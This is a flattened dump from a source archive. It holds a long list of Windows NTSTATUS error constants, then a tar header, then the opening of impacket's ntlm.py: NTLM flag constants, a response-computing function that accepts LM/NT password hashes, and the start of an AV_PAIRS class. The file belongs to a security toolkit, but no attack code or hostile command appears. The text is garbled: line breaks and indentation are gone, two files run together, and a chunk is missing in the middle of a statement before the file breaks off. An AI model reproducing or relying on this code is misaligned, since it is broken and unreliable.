STATUS_GRAPHICS_ALLOCATION_INVALID = 0xC01E0106 STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE = 0xC01E0107 STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED = 0xC01E0108 STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION = 0xC01E0109 STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE = 0xC01E0110 STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION = 0xC01E0111 STATUS_GRAPHICS_ALLOCATION_CLOSED = 0xC01E0112 STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE = 0xC01E0113 STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE = 0xC01E0114 STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE = 0xC01E0115 STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST = 0xC01E0116 STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE = 0xC01E0200 STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY = 0xC01E0300 STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED = 0xC01E0301 STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED = 0xC01E0302 STATUS_GRAPHICS_INVALID_VIDPN = 0xC01E0303 STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE = 0xC01E0304 STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET = 0xC01E0305 STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED = 0xC01E0306 STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET = 0xC01E0308 STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET = 0xC01E0309 STATUS_GRAPHICS_INVALID_FREQUENCY = 0xC01E030A STATUS_GRAPHICS_INVALID_ACTIVE_REGION = 0xC01E030B STATUS_GRAPHICS_INVALID_TOTAL_REGION = 0xC01E030C STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE = 0xC01E0310 STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE = 0xC01E0311 STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET = 0xC01E0312 STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY = 0xC01E0313 STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET = 0xC01E0314 STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET = 0xC01E0315 STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET = 0xC01E0316 STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET = 0xC01E0317 STATUS_GRAPHICS_TARGET_ALREADY_IN_SET = 0xC01E0318 STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH = 0xC01E0319 STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY = 0xC01E031A STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET = 0xC01E031B STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE = 0xC01E031C STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET = 0xC01E031D STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET = 0xC01E031F STATUS_GRAPHICS_STALE_MODESET = 0xC01E0320 STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET = 0xC01E0321 STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE = 0xC01E0322 STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN = 0xC01E0323 STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE = 0xC01E0324 STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION = 0xC01E0325 STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES = 0xC01E0326 STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY = 0xC01E0327 STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE = 0xC01E0328 STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET = 0xC01E0329 STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET = 0xC01E032A STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR = 0xC01E032B STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET = 0xC01E032C STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET = 0xC01E032D STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE = 0xC01E032E STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE = 0xC01E032F STATUS_GRAPHICS_RESOURCES_NOT_RELATED = 0xC01E0330 STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE = 0xC01E0331 STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE = 0xC01E0332 STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET = 0xC01E0333 STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER = 0xC01E0334 STATUS_GRAPHICS_NO_VIDPNMGR = 0xC01E0335 STATUS_GRAPHICS_NO_ACTIVE_VIDPN = 0xC01E0336 STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY = 0xC01E0337 STATUS_GRAPHICS_MONITOR_NOT_CONNECTED = 0xC01E0338 STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY = 0xC01E0339 STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE = 0xC01E033A STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE = 0xC01E033B STATUS_GRAPHICS_INVALID_STRIDE = 0xC01E033C STATUS_GRAPHICS_INVALID_PIXELFORMAT = 0xC01E033D STATUS_GRAPHICS_INVALID_COLORBASIS = 0xC01E033E STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE = 0xC01E033F STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY = 0xC01E0340 STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT = 0xC01E0341 STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE = 0xC01E0342 STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN = 0xC01E0343 STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL = 0xC01E0344 STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION = 0xC01E0345 STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED = 0xC01E0346 STATUS_GRAPHICS_INVALID_GAMMA_RAMP = 0xC01E0347 STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED = 0xC01E0348 STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED = 0xC01E0349 STATUS_GRAPHICS_MODE_NOT_IN_MODESET = 0xC01E034A STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON = 0xC01E034D STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE = 0xC01E034E STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE = 0xC01E034F STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS = 0xC01E0350 STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING = 0xC01E0352 STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED = 0xC01E0353 STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS = 0xC01E0354 STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT = 0xC01E0355 STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM = 0xC01E0356 STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN = 0xC01E0357 STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT = 0xC01E0358 STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED = 0xC01E0359 STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION = 0xC01E035A STATUS_GRAPHICS_INVALID_CLIENT_TYPE = 0xC01E035B STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET = 0xC01E035C STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED = 0xC01E0400 STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED = 0xC01E0401 STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER = 0xC01E0430 STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED = 0xC01E0431 STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED = 0xC01E0432 STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY = 0xC01E0433 STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED = 0xC01E0434 STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON = 0xC01E0435 STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE = 0xC01E0436 STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER = 0xC01E0438 STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED = 0xC01E043B STATUS_GRAPHICS_OPM_NOT_SUPPORTED = 0xC01E0500 STATUS_GRAPHICS_COPP_NOT_SUPPORTED = 0xC01E0501 STATUS_GRAPHICS_UAB_NOT_SUPPORTED = 0xC01E0502 STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS = 0xC01E0503 STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL = 0xC01E0504 STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST = 0xC01E0505 STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME = 0xC01E0506 STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP = 0xC01E0507 STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED = 0xC01E0508 STATUS_GRAPHICS_OPM_INVALID_POINTER = 0xC01E050A STATUS_GRAPHICS_OPM_INTERNAL_ERROR = 0xC01E050B STATUS_GRAPHICS_OPM_INVALID_HANDLE = 0xC01E050C STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE = 0xC01E050D STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH = 0xC01E050E STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED = 0xC01E050F STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED = 0xC01E0510 STATUS_GRAPHICS_PVP_HFS_FAILED = 0xC01E0511 STATUS_GRAPHICS_OPM_INVALID_SRM = 0xC01E0512 STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP = 0xC01E0513 STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP = 0xC01E0514 STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA = 0xC01E0515 STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET = 0xC01E0516 STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH = 0xC01E0517 STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE = 0xC01E0518 STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS = 0xC01E051A STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS = 0xC01E051B STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS = 0xC01E051C STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST = 0xC01E051D STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR = 0xC01E051E STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS = 0xC01E051F STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED = 0xC01E0520 STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST = 0xC01E0521 STATUS_GRAPHICS_I2C_NOT_SUPPORTED = 0xC01E0580 STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST = 0xC01E0581 STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA = 0xC01E0582 STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA = 0xC01E0583 STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED = 0xC01E0584 STATUS_GRAPHICS_DDCCI_INVALID_DATA = 0xC01E0585 STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE = 0xC01E0586 STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING = 0xC01E0587 STATUS_GRAPHICS_MCA_INTERNAL_ERROR = 0xC01E0588 STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND = 0xC01E0589 STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH = 0xC01E058A STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM = 0xC01E058B STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE = 0xC01E058C STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS = 0xC01E058D STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED = 0xC01E05E0 STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME = 0xC01E05E1 STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP = 0xC01E05E2 STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED = 0xC01E05E3 STATUS_GRAPHICS_INVALID_POINTER = 0xC01E05E4 STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE = 0xC01E05E5 STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL = 0xC01E05E6 STATUS_GRAPHICS_INTERNAL_ERROR = 0xC01E05E7 STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS = 0xC01E05E8 STATUS_FVE_LOCKED_VOLUME = 0xC0210000 STATUS_FVE_NOT_ENCRYPTED = 0xC0210001 STATUS_FVE_BAD_INFORMATION = 0xC0210002 STATUS_FVE_TOO_SMALL = 0xC0210003 STATUS_FVE_FAILED_WRONG_FS = 0xC0210004 STATUS_FVE_FAILED_BAD_FS = 0xC0210005 STATUS_FVE_FS_NOT_EXTENDED = 0xC0210006 STATUS_FVE_FS_MOUNTED = 0xC0210007 STATUS_FVE_NO_LICENSE = 0xC0210008 STATUS_FVE_ACTION_NOT_ALLOWED = 0xC0210009 STATUS_FVE_BAD_DATA = 0xC021000A STATUS_FVE_VOLUME_NOT_BOUND = 0xC021000B STATUS_FVE_NOT_DATA_VOLUME = 0xC021000C STATUS_FVE_CONV_READ_ERROR = 0xC021000D STATUS_FVE_CONV_WRITE_ERROR = 0xC021000E STATUS_FVE_OVERLAPPED_UPDATE = 0xC021000F STATUS_FVE_FAILED_SECTOR_SIZE = 0xC0210010 STATUS_FVE_FAILED_AUTHENTICATION = 0xC0210011 STATUS_FVE_NOT_OS_VOLUME = 0xC0210012 STATUS_FVE_KEYFILE_NOT_FOUND = 0xC0210013 STATUS_FVE_KEYFILE_INVALID = 0xC0210014 STATUS_FVE_KEYFILE_NO_VMK = 0xC0210015 STATUS_FVE_TPM_DISABLED = 0xC0210016 STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO = 0xC0210017 STATUS_FVE_TPM_INVALID_PCR = 0xC0210018 STATUS_FVE_TPM_NO_VMK = 0xC0210019 STATUS_FVE_PIN_INVALID = 0xC021001A STATUS_FVE_AUTH_INVALID_APPLICATION = 0xC021001B STATUS_FVE_AUTH_INVALID_CONFIG = 0xC021001C STATUS_FVE_DEBUGGER_ENABLED = 0xC021001D STATUS_FVE_DRY_RUN_FAILED = 0xC021001E STATUS_FVE_BAD_METADATA_POINTER = 0xC021001F STATUS_FVE_OLD_METADATA_COPY = 0xC0210020 STATUS_FVE_REBOOT_REQUIRED = 0xC0210021 STATUS_FVE_RAW_ACCESS = 0xC0210022 STATUS_FVE_RAW_BLOCKED = 0xC0210023 STATUS_FVE_NO_FEATURE_LICENSE = 0xC0210026 STATUS_FVE_POLICY_USER_DISABLE_RDV_NOT_ALLOWED = 0xC0210027 STATUS_FVE_CONV_RECOVERY_FAILED = 0xC0210028 STATUS_FVE_VIRTUALIZED_SPACE_TOO_BIG = 0xC0210029 STATUS_FVE_VOLUME_TOO_SMALL = 0xC0210030 STATUS_FWP_CALLOUT_NOT_FOUND = 0xC0220001 STATUS_FWP_CONDITION_NOT_FOUND = 0xC0220002 STATUS_FWP_FILTER_NOT_FOUND = 0xC0220003 STATUS_FWP_LAYER_NOT_FOUND = 0xC0220004 STATUS_FWP_PROVIDER_NOT_FOUND = 0xC0220005 STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND = 0xC0220006 STATUS_FWP_SUBLAYER_NOT_FOUND = 0xC0220007 STATUS_FWP_NOT_FOUND = 0xC0220008 STATUS_FWP_ALREADY_EXISTS = 0xC0220009 STATUS_FWP_IN_USE = 0xC022000A STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS = 0xC022000B STATUS_FWP_WRONG_SESSION = 0xC022000C STATUS_FWP_NO_TXN_IN_PROGRESS = 0xC022000D STATUS_FWP_TXN_IN_PROGRESS = 0xC022000E STATUS_FWP_TXN_ABORTED = 0xC022000F STATUS_FWP_SESSION_ABORTED = 0xC0220010 STATUS_FWP_INCOMPATIBLE_TXN = 0xC0220011 STATUS_FWP_TIMEOUT = 0xC0220012 STATUS_FWP_NET_EVENTS_DISABLED = 0xC0220013 STATUS_FWP_INCOMPATIBLE_LAYER = 0xC0220014 STATUS_FWP_KM_CLIENTS_ONLY = 0xC0220015 STATUS_FWP_LIFETIME_MISMATCH = 0xC0220016 STATUS_FWP_BUILTIN_OBJECT = 0xC0220017 STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS = 0xC0220018 STATUS_FWP_TOO_MANY_CALLOUTS = 0xC0220018 STATUS_FWP_NOTIFICATION_DROPPED = 0xC0220019 STATUS_FWP_TRAFFIC_MISMATCH = 0xC022001A STATUS_FWP_INCOMPATIBLE_SA_STATE = 0xC022001B STATUS_FWP_NULL_POINTER = 0xC022001C STATUS_FWP_INVALID_ENUMERATOR = 0xC022001D STATUS_FWP_INVALID_FLAGS = 0xC022001E STATUS_FWP_INVALID_NET_MASK = 0xC022001F STATUS_FWP_INVALID_RANGE = 0xC0220020 STATUS_FWP_INVALID_INTERVAL = 0xC0220021 STATUS_FWP_ZERO_LENGTH_ARRAY = 0xC0220022 STATUS_FWP_NULL_DISPLAY_NAME = 0xC0220023 STATUS_FWP_INVALID_ACTION_TYPE = 0xC0220024 STATUS_FWP_INVALID_WEIGHT = 0xC0220025 STATUS_FWP_MATCH_TYPE_MISMATCH = 0xC0220026 STATUS_FWP_TYPE_MISMATCH = 0xC0220027 STATUS_FWP_OUT_OF_BOUNDS = 0xC0220028 STATUS_FWP_RESERVED = 0xC0220029 STATUS_FWP_DUPLICATE_CONDITION = 0xC022002A STATUS_FWP_DUPLICATE_KEYMOD = 0xC022002B STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER = 0xC022002C STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER = 0xC022002D STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER = 0xC022002E STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT = 0xC022002F STATUS_FWP_INCOMPATIBLE_AUTH_METHOD = 0xC0220030 STATUS_FWP_INCOMPATIBLE_DH_GROUP = 0xC0220031 STATUS_FWP_EM_NOT_SUPPORTED = 0xC0220032 STATUS_FWP_NEVER_MATCH = 0xC0220033 STATUS_FWP_PROVIDER_CONTEXT_MISMATCH = 0xC0220034 STATUS_FWP_INVALID_PARAMETER = 0xC0220035 STATUS_FWP_TOO_MANY_SUBLAYERS = 0xC0220036 STATUS_FWP_CALLOUT_NOTIFICATION_FAILED = 0xC0220037 STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG = 0xC0220038 STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG = 0xC0220039 STATUS_FWP_DUPLICATE_AUTH_METHOD = 0xC022003C STATUS_FWP_TCPIP_NOT_READY = 0xC0220100 STATUS_FWP_INJECT_HANDLE_CLOSING = 0xC0220101 STATUS_FWP_INJECT_HANDLE_STALE = 0xC0220102 STATUS_FWP_CANNOT_PEND = 0xC0220103 STATUS_NDIS_CLOSING = 0xC0230002 STATUS_NDIS_BAD_VERSION = 0xC0230004 STATUS_NDIS_BAD_CHARACTERISTICS = 0xC0230005 STATUS_NDIS_ADAPTER_NOT_FOUND = 0xC0230006 STATUS_NDIS_OPEN_FAILED = 0xC0230007 STATUS_NDIS_DEVICE_FAILED = 0xC0230008 STATUS_NDIS_MULTICAST_FULL = 0xC0230009 STATUS_NDIS_MULTICAST_EXISTS = 0xC023000A STATUS_NDIS_MULTICAST_NOT_FOUND = 0xC023000B STATUS_NDIS_REQUEST_ABORTED = 0xC023000C STATUS_NDIS_RESET_IN_PROGRESS = 0xC023000D STATUS_NDIS_INVALID_PACKET = 0xC023000F STATUS_NDIS_INVALID_DEVICE_REQUEST = 0xC0230010 STATUS_NDIS_ADAPTER_NOT_READY = 0xC0230011 STATUS_NDIS_INVALID_LENGTH = 0xC0230014 STATUS_NDIS_INVALID_DATA = 0xC0230015 STATUS_NDIS_BUFFER_TOO_SHORT = 0xC0230016 STATUS_NDIS_INVALID_OID = 0xC0230017 STATUS_NDIS_ADAPTER_REMOVED = 0xC0230018 STATUS_NDIS_UNSUPPORTED_MEDIA = 0xC0230019 STATUS_NDIS_GROUP_ADDRESS_IN_USE = 0xC023001A STATUS_NDIS_FILE_NOT_FOUND = 0xC023001B STATUS_NDIS_ERROR_READING_FILE = 0xC023001C STATUS_NDIS_ALREADY_MAPPED = 0xC023001D STATUS_NDIS_RESOURCE_CONFLICT = 0xC023001E STATUS_NDIS_MEDIA_DISCONNECTED = 0xC023001F STATUS_NDIS_INVALID_ADDRESS = 0xC0230022 STATUS_NDIS_PAUSED = 0xC023002A STATUS_NDIS_INTERFACE_NOT_FOUND = 0xC023002B STATUS_NDIS_UNSUPPORTED_REVISION = 0xC023002C STATUS_NDIS_INVALID_PORT = 0xC023002D STATUS_NDIS_INVALID_PORT_STATE = 0xC023002E STATUS_NDIS_LOW_POWER_STATE = 0xC023002F STATUS_NDIS_NOT_SUPPORTED = 0xC02300BB STATUS_NDIS_OFFLOAD_POLICY = 0xC023100F STATUS_NDIS_OFFLOAD_CONNECTION_REJECTED = 0xC0231012 STATUS_NDIS_OFFLOAD_PATH_REJECTED = 0xC0231013 STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED = 0xC0232000 STATUS_NDIS_DOT11_MEDIA_IN_USE = 0xC0232001 STATUS_NDIS_DOT11_POWER_STATE_INVALID = 0xC0232002 STATUS_NDIS_PM_WOL_PATTERN_LIST_FULL = 0xC0232003 STATUS_NDIS_PM_PROTOCOL_OFFLOAD_LIST_FULL = 0xC0232004 STATUS_IPSEC_BAD_SPI = 0xC0360001 STATUS_IPSEC_SA_LIFETIME_EXPIRED = 0xC0360002 STATUS_IPSEC_WRONG_SA = 0xC0360003 STATUS_IPSEC_REPLAY_CHECK_FAILED = 0xC0360004 STATUS_IPSEC_INVALID_PACKET = 0xC0360005 STATUS_IPSEC_INTEGRITY_CHECK_FAILED = 0xC0360006 STATUS_IPSEC_CLEAR_TEXT_DROP = 0xC0360007 STATUS_IPSEC_AUTH_FIREWALL_DROP = 0xC0360008 STATUS_IPSEC_THROTTLE_DROP = 0xC0360009 STATUS_IPSEC_DOSP_BLOCK = 0xC0368000 STATUS_IPSEC_DOSP_RECEIVED_MULTICAST = 0xC0368001 STATUS_IPSEC_DOSP_INVALID_PACKET = 0xC0368002 STATUS_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0xC0368003 STATUS_IPSEC_DOSP_MAX_ENTRIES = 0xC0368004 STATUS_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0xC0368005 STATUS_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0xC0368006 STATUS_VOLMGR_MIRROR_NOT_SUPPORTED = 0xC038005B STATUS_VOLMGR_RAID5_NOT_SUPPORTED = 0xC038005C STATUS_VIRTDISK_PROVIDER_NOT_FOUND = 0xC03A0014 STATUS_VIRTDISK_NOT_VIRTUAL_DISK = 0xC03A0015 STATUS_VHD_PARENT_VHD_ACCESS_DENIED = 0xC03A0016 STATUS_VHD_CHILD_PARENT_SIZE_MISMATCH = 0xC03A0017 STATUS_VHD_DIFFERENCING_CHAIN_CYCLE_DETECTED = 0xC03A0018 STATUS_VHD_DIFFERENCING_CHAIN_ERROR_IN_PARENT = 0xC03A0019 impacket-0.9.10/impacket/ntlm.py0000600000076500000240000010073512141750575016600 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies: # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: ntlm.py 753 2013-05-05 15:39:19Z bethus@gmail.com $ # import base64 import array import struct import calendar import time import hashlib import random import string import binascii from impacket.structure import Structure # This is important. NTLMv2 is not negotiated by the client or server. # It is used if set locally on both sides. Change this item if you don't want to use # NTLMv2 by default and fall back to NTLMv1 (with EXTENDED_SESSION_SECURITY or not) # Check the following links: # http://davenport.sourceforge.net/ntlm.html # http://blogs.msdn.com/b/openspecification/archive/2010/04/20/ntlm-keys-and-sundry-stuff.aspx # http://social.msdn.microsoft.com/Forums/en-US/os_interopscenarios/thread/c8f488ed-1b96-4e06-bd65-390aa41138d1/ # So I'm setting a global variable to control this, this can also be set programmatically USE_NTLMv2 = True # if false will fall back to NTLMv1 (or NTLMv1 with ESS a.k.a NTLM2) def computeResponse(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash = '', nthash = '', use_ntlmv2 = USE_NTLMv2): if use_ntlmv2: return computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 = use_ntlmv2) else: return computeResponseNTLMv1(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 = use_ntlmv2) try: POW = None from Crypto.Cipher import ARC4 from Crypto.Cipher import DES from Crypto.Hash import MD4 except Exception: try: import POW except Exception: print "Warning: You don't have any crypto installed. You need either POW or PyCrypto" print "We suggest PyCrypto. See http://www.pycrypto.org/" NTLM_AUTH_NONE = 1 NTLM_AUTH_CONNECT = 2 NTLM_AUTH_CALL = 3 NTLM_AUTH_PKT = 4 NTLM_AUTH_PKT_INTEGRITY = 5 NTLM_AUTH_PKT_PRIVACY = 6 NTLMSSP_KEY_56 = 0x80000000 NTLMSSP_KEY_EXCHANGE = 0x40000000 NTLMSSP_KEY_128 = 0x20000000 # NTLMSSP_ = 0x10000000 # NTLMSSP_ = 0x08000000 # NTLMSSP_ = 0x04000000 NTLMSSP_VERSION = 0x02000000 # NTLMSSP_ = 0x01000000 NTLMSSP_TARGET_INFO = 0x00800000 # NTLMSSP_ = 0x00200000 # NTLMSSP_ = 0x00100000 NTLMSSP_NTLM2_KEY = 0x00080000 NTLMSSP_NOT_NT_KEY = 0x00400000 NTLMSSP_CHALL_NOT_NT = 0x00040000 NTLMSSP_TARGET_TYPE_SERVER = 0x00020000 NTLMSSP_CHALL_INIT = 0x00010000 NTLMSSP_ALWAYS_SIGN = 0x00008000 # forces the other end to sign packets NTLMSSP_LOCAL_CALL = 0x00004000 NTLMSSP_WORKSTATION = 0x00002000 NTLMSSP_DOMAIN = 0x00001000 # NTLMSSP_ = 0x00000800 # NTLMSSP_ = 0x00000400 NTLMSSP_NTLM_KEY = 0x00000200 NTLMSSP_NETWARE = 0x00000100 NTLMSSP_LM_KEY = 0x00000080 NTLMSSP_DATAGRAM = 0x00000040 NTLMSSP_SEAL = 0x00000020 NTLMSSP_SIGN = 0x00000010 # means packet is signed, if verifier is wrong it fails # NTLMSSP_ = 0x00000008 NTLMSSP_TARGET = 0x00000004 NTLMSSP_OEM = 0x00000002 NTLMSSP_UNICODE = 0x00000001 # AV_PAIR constants NTLMSSP_AV_EOL = 0x00 NTLMSSP_AV_HOSTNAME = 0x01 NTLMSSP_AV_DOMAINNAME = 0x02 NTLMSSP_AV_DNS_HOSTNAME = 0x03 NTLMSSP_AV_DNS_DOMAINNAME = 0x04 NTLMSSP_AV_DNS_TREENAME = 0x05 NTLMSSP_AV_FLAGS = 0x06 NTLMSSP_AV_TIME = 0x07 NTLMSSP_AV_RESTRICTIONS = 0x08 NTLMSSP_AV_TARGET_NAME = 0x09 NTLMSSP_AV_CHANNEL_BINDINGS = 0x0a class AV_PAIRS(): def __init__(self, data = None): self.fields = {} if data is not None: self.fromString(data) def __setitem__(self,key,value): self.fields[key] = (len(value),value) def __getitem__(self, key): if self.fields.has_key(key): return self.fields[key] return None def __delitem__(self, key): del self.fields[key] def __len__(self): return len(self.getData()) def __str__(self): return len(self.getData()) def fromString(self, data): tInfo = data fType = 0xff while fType is not NTLMSSP_AV_EOL: fType = struct.unpack(' 0: self['flags'] |= NTLMSSP_WORKSTATION if len(self.fields['domain_name']) > 0: 